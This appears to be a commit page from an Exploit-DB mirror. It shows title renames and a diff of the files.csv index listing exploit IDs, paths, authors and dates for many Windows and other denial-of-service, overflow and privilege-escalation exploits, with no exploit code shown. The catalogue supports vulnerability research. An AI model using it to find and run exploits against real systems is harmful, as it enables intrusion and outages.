bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-04-01

Browse source 
2 new exploits

Microsoft Windows Server 2003/XP - Samba Share Resource Exhaustion Exploit
Microsoft Windows XP/2003 - Samba Share Resource Exhaustion Exploit

Microsoft Windows Server 2000/XP - TCP Connection Reset Remote Attack Tool
Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool

Microsoft Windows Server 2003/XP - Remote Denial of Service
Microsoft Windows XP/2003 - Remote Denial of Service

Microsoft Windows Server 2003/XP - IPv6 Remote Denial of Service
Microsoft Windows XP/2003 - IPv6 Remote Denial of Service

Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (1)
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)

Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (2)
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnINSTRING Local kernel Denial of Service
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service

Microsoft Windows - cmd.exe Unicode Buffer Overflow (SEH)
Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)

Microsoft Windows Win32k!xxxRealDrawMenuItem() - Missing HBITMAP Bounds Checks
Microsoft Windows - Win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks

Microsoft Windows - (IcmpSendEcho2Ex Interrupting) Denial of Service
Microsoft Windows - IcmpSendEcho2Ex Interrupting Denial of Service

Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (1)
Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (2)
Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (3)
Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)
Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)

Microsoft Windows Server 2000/XP - GDI Denial of Service
Microsoft Windows XP/2000 - GDI Denial of Service

Microsoft Windows Help program - 'WinHlp32.exe' Crash (PoC)
Microsoft Windows Help Program - 'WinHlp32.exe' Crash (PoC)

Microsoft Windows Server 2000/2003/XP - Graphical Device Interface Library Denial of Service
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service

Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (1)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (1)

Microsoft Windows Server 2000/2003/XP - MSDTC TIP Denial of Service (MS05-051)
Microsoft Windows XP/2000/2003 - MSDTC TIP Denial of Service (MS05-051)

Microsoft Windows Server 2000/2003/XP - CreateRemoteThread Local Denial of Service
Microsoft Windows XP/2000/2003 - CreateRemoteThread Local Denial of Service

Microsoft Windows Server 2000/XP - Registry Access Local Denial of Service
Microsoft Windows XP/2000 - Registry Access Local Denial of Service

Microsoft Windows XP - cmd.exe Buffer Overflow
Microsoft Windows XP - 'cmd.exe' Buffer Overflow

Microsoft Windows Explorer - explorer.exe WMV File Handling Denial of Service
Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service

Microsoft Windows Server 2003/XP - Explorer .WMF File Handling Denial of Service
Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service

Microsoft Windows Kernel 'win32k.sys' - Integer Overflow (MS13-101)
Microsoft Windows Kernel - 'win32k.sys' Integer Overflow (MS13-101)

Microsoft Windows Media Player 11 - AVI File Colorspace Conversion Remote Memory Corruption
Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption

Microsoft Windows = devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)
Microsoft Windows - devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)

Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)
Microsoft Windows - ListBox/ComboBox Control Local Exploit (MS03-045)

Microsoft Windows Server 2000/XP - Task Scheduler .job Exploit (MS04-022)
Microsoft Windows Task Scheduler (Windows XP/2000) - '.job' Exploit (MS04-022)
Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)
Microsoft Windows Server 2000/XP - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)
Microsoft Windows - NtClose DeadLock PoC (MS06-030)
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Privilege Escalation PoC (MS06-030)

Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)
Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (K-plugin) (MS08-066)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)
Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (1)

Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)
Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (1)

Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (1)
Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (1)

Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (2)
Adobe - 'Doc.media.newPlayer' Use-After-Free (Metasploit) (2)

Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)
Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) (2)

Adobe - Collab.getIcon() Buffer Overflow (Metasploit) (2)
Adobe - 'Collab.getIcon()' Buffer Overflow (Metasploit) (2)

Microsoft Windows Server 2003/XP - 'afd.sys' Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Privilege Escalation (MS11-080)

Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver
Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver

Microsoft Windows Server 2000/2003/XP - Keyboard Event Privilege Escalation
Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation

Microsoft Windows Server 2003/XP - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure

Microsoft Windows Server 2003/XP - RPCSS Service Isolation Privilege Escalation
Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation

Microsoft Windows Server 2000/2003/XP - Desktop Wall Paper System Parameter Privilege Escalation
Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation

Microsoft Windows Server 2000/2003/XP/Vista - Double-Free Memory Corruption Privilege Escalation
Microsoft Windows XP/Vista/2000/2003 - Double-Free Memory Corruption Privilege Escalation

KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow
KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow

Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)

Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)
Microsoft Windows XP/2000 - 'RPC DCOM' Remote Exploit (MS03-026)
Microsoft Windows Server 2000/XP - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)
Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit
Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)

Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)
Microsoft Windows Messenger Service (French) - Remote Exploit (MS03-043)

Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)
Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)

Microsoft Windows Server 2003/XP - Metafile Escape() Code Execution (Metasploit)
Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)

eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)

Apple QuickTime 7.2/7.3 (Windows Vista / Windows XP) - RSTP Response Code Execution
Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution

Microsoft Windows Server 2003/XP/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)
Microsoft IIS4 (Windows NT) - Remote Web-Based Administration
Microsoft IIS4 (Windows NT) - Log Avoidance
Microsoft IIS 4 (Windows NT) - Remote Web-Based Administration
Microsoft IIS 4 (Windows NT) - Log Avoidance

Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - IIS IDC Path Mapping
Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping

Microsoft Internet Explorer 4 (Windows 95/Windows NT 4) - Setupctl ActiveX Control Buffer Overflow
Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow

Microsoft Windows Server 2000 - telnet.exe NTLM Authentication
Microsoft Windows Server 2000 - 'telnet.exe' NTLM Authentication
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Integer Overflow
Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Heap Overflow
Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow
Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow

Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (2)
Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)

Microsoft Windows Explorer 2000/2003/XP - Drag and Drop Remote Code Execution
Microsoft Windows XP/2000/2003 - Explorer Drag and Drop Remote Code Execution

Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)

Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow

Windows XP/Vista/Windows 7 - JITed egg-hunter stage-0 Shellcode Adjusted universal
Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal

Dosya Yukle Scrtipi 1.0 - Arbitrary File Upload
Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload

DosyaYukle Scripti 1.0 - Arbitrary File Upload
Splunk Enterprise - Information Disclosure
Membership Formula - 'order' Parameter SQL Injection
This commit is contained in:
Offensive Security 2017-04-01 05:01:15 +00:00
parent 6d17bc529d
commit 52fd3d8a20
5 changed files with 238 additions and 81 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

137
files.csv
View file

@ -20,7 +20,7 @@ id,file,description,date,author,platform,type,port
115,platforms/linux/dos/115.c,"WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service",2003-10-31,"Angelo Rosiello",linux,dos,0
146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0
147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows Server 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
148,platforms/windows/dos/148.sh,"Microsoft Windows XP/2003 - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0
153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0
161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0
170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
@ -40,7 +40,7 @@ id,file,description,date,author,platform,type,port
262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0
276,platforms/windows/dos/276.delphi,"Microsoft Windows Server 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80
299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0
306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0
@ -142,7 +142,7 @@ id,file,description,date,author,platform,type,port
852,platforms/windows/dos/852.py,"Trillian Basic 3.0 - '.png' Image Processing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,dos,0
855,platforms/multiple/dos/855.pl,"Apache 2.0.52 - HTTP GET request Denial of Service",2005-03-04,GreenwooD,multiple,dos,0
856,platforms/hardware/dos/856.c,"Nokia Symbian 60 - (BlueTooth Nickname) Remote Restart (2)",2005-09-23,Qnix,hardware,dos,0
861,platforms/windows/dos/861.c,"Microsoft Windows Server 2003/XP - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
861,platforms/windows/dos/861.c,"Microsoft Windows XP/2003 - Remote Denial of Service",2005-03-07,RusH,windows,dos,0
867,platforms/multiple/dos/867.c,"Ethereal 0.10.9 - Denial of Service",2005-03-08,"Leon Juranic",multiple,dos,0
869,platforms/bsd/dos/869.c,"OpenBSD 2.0 < 3.6 - TCP Timestamp Remote Denial of Service",2005-03-09,RusH,bsd,dos,0
874,platforms/windows/dos/874.cpp,"Ethereal 0.10.9 (Windows) - '3G-A11' Remote Buffer Overflow",2005-03-12,"Leon Juranic",windows,dos,0
@ -174,7 +174,7 @@ id,file,description,date,author,platform,type,port
988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0
998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0
999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0
1000,platforms/windows/dos/1000.cpp,"Microsoft Windows Server 2003/XP - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0
1000,platforms/windows/dos/1000.cpp,"Microsoft Windows XP/2003 - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0
1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0
1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0
1025,platforms/windows/dos/1025.html,"Microsoft Internet Explorer - JavaScript 'window()' Crash",2005-05-31,"Benjamin Franz",windows,dos,0
@ -299,9 +299,9 @@ id,file,description,date,author,platform,type,port
1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0
1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0
1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0
1599,platforms/windows/dos/1599.cpp,"Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0
1599,platforms/windows/dos/1599.cpp,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)",2006-03-21,"Alexey Sintsov",windows,dos,0
1601,platforms/windows/dos/1601.c,"ASP.NET w3wp - (COM Components) Remote Crash",2006-03-22,"Debasis Mohanty",windows,dos,0
1603,platforms/windows/dos/1603.c,"Microsoft Windows Server 2003/XP - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
1603,platforms/windows/dos/1603.c,"Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0
1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6 - 'mshtml.dll checkbox' Crash",2006-03-22,"Stelian Ene",windows,dos,0
1613,platforms/windows/dos/1613.c,"Vavoom 1.19.1 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
1614,platforms/windows/dos/1614.c,"csDoom 0.7 - Multiple Vulnerabilities/Denial of Service",2006-03-26,"Luigi Auriemma",windows,dos,0
@ -1507,8 +1507,8 @@ id,file,description,date,author,platform,type,port
12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0
12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0
12334,platforms/linux/dos/12334.c,"OpenSSL - Remote Denial of Service",2010-04-22,Andi,linux,dos,0
12336,platforms/windows/dos/12336.c,"Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
12337,platforms/windows/dos/12337.c,"Microsoft Windows Server 2000/2003/XP - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
12336,platforms/windows/dos/12336.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
12337,platforms/windows/dos/12337.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0
12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0
12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0
12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0
@ -1620,7 +1620,7 @@ id,file,description,date,author,platform,type,port
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - 'wpd' Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0
@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port
14646,platforms/windows/dos/14646.py,"CA Advantage Ingres 2.6 - Multiple Buffer Overflow Vulnerabilities (PoC)",2010-08-14,fdiskyou,windows,dos,0
14666,platforms/windows/dos/14666.txt,"Microsoft Windows - nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
14667,platforms/windows/dos/14667.txt,"Microsoft Windows - KTM Invalid Free with Reused Transaction GUID (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
14668,platforms/windows/dos/14668.txt,"Microsoft Windows Win32k!xxxRealDrawMenuItem() - Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0
14668,platforms/windows/dos/14668.txt,"Microsoft Windows - Win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks",2010-08-17,"Tavis Ormandy",windows,dos,0
14669,platforms/windows/dos/14669.txt,"Microsoft Windows - Win32k!GreStretchBltInternal() Does Not Handle src == dest",2010-08-17,"Tavis Ormandy",windows,dos,0
14670,platforms/windows/dos/14670.txt,"Microsoft Windows - nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047)",2010-08-17,"Tavis Ormandy",windows,dos,0
14671,platforms/windows/dos/14671.py,"Brazip 9.0 - '.zip' Buffer Overflow (SEH)",2010-08-17,ITSecTeam,windows,dos,0
@ -1682,7 +1682,7 @@ id,file,description,date,author,platform,type,port
14695,platforms/windows/dos/14695.pl,"Karaoke Video Creator 2.2.8 - Denial of Service",2010-08-20,PASSEWORD,windows,dos,0
14698,platforms/windows/dos/14698.py,"AV Music Morpher Gold 5.0.38 - '.m3u' Denial of Service",2010-08-20,b0telh0,windows,dos,0
14699,platforms/windows/dos/14699.py,"PlayPad Music Player 1.12 - '.mp3' Denial of Service",2010-08-20,"Praveen Darshanam",windows,dos,0
14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex Interrupting) Denial of Service",2010-08-21,l3D,windows,dos,0
14705,platforms/windows/dos/14705.c,"Microsoft Windows - IcmpSendEcho2Ex Interrupting Denial of Service",2010-08-21,l3D,windows,dos,0
14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service",2010-08-23,41.w4r10r,windows,dos,0
14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service",2010-08-23,41.w4r10r,windows,dos,0
14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
@ -2232,7 +2232,7 @@ id,file,description,date,author,platform,type,port
19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
19137,platforms/hardware/dos/19137.rb,"Wyse - Machine Remote Power off (DOS) without any Privilege (Metasploit)",2012-06-14,it.solunium,hardware,dos,0
19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0
19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0
19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
19181,platforms/windows/dos/19181.txt,"XnView - '.RAS' Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0
@ -2280,8 +2280,8 @@ id,file,description,date,author,platform,type,port
19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
29039,platforms/windows/dos/29039.py,"Kerio MailServer 5.x/6.x - Remote LDAP Denial of Service",2006-11-15,"Evgeny Legerov",windows,dos,0
19409,platforms/windows/dos/19409.txt,"Sielco Sistemi Winlog 2.07.16 - Multiple Vulnerabilities",2012-06-27,"Luigi Auriemma",windows,dos,0
19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0
19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / Windows NT Enterprise Server 4.0 SP5 / Windows NT Terminal Server 4.0 SP4 / Windows NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0
19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0
19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0
19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0
19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0
@ -2572,7 +2572,7 @@ id,file,description,date,author,platform,type,port
21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0
21123,platforms/windows/dos/21123.txt,"Microsoft Windows Server 2000/NT - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0
21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0
21131,platforms/windows/dos/21131.txt,"Microsoft Windows Server 2000/XP - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
21131,platforms/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0
21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0
21141,platforms/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
@ -2784,7 +2784,7 @@ id,file,description,date,author,platform,type,port
22290,platforms/windows/dos/22290.c,"Electronic Arts Battlefield 1942 1.2/1.3 - Remote Administration Authentication Buffer Overflow",2003-02-26,greuff,windows,dos,0
22294,platforms/linux/dos/22294.c,"TCPDump 3.x - Malformed ISAKMP Packet Denial of Service",2003-03-01,"The Salvia Twist",linux,dos,0
22302,platforms/windows/dos/22302.rb,"hMAilServer 5.3.3 - IMAP Remote Crash (PoC)",2012-10-28,"John Smith",windows,dos,0
22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program - 'WinHlp32.exe' Crash (PoC)",2012-10-28,coolkaveh,windows,dos,0
22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help Program - 'WinHlp32.exe' Crash (PoC)",2012-10-28,coolkaveh,windows,dos,0
22330,platforms/windows/dos/22330.txt,"Microsoft Excel 2010 - Crash (PoC) (1)",2012-10-29,coolkaveh,windows,dos,0
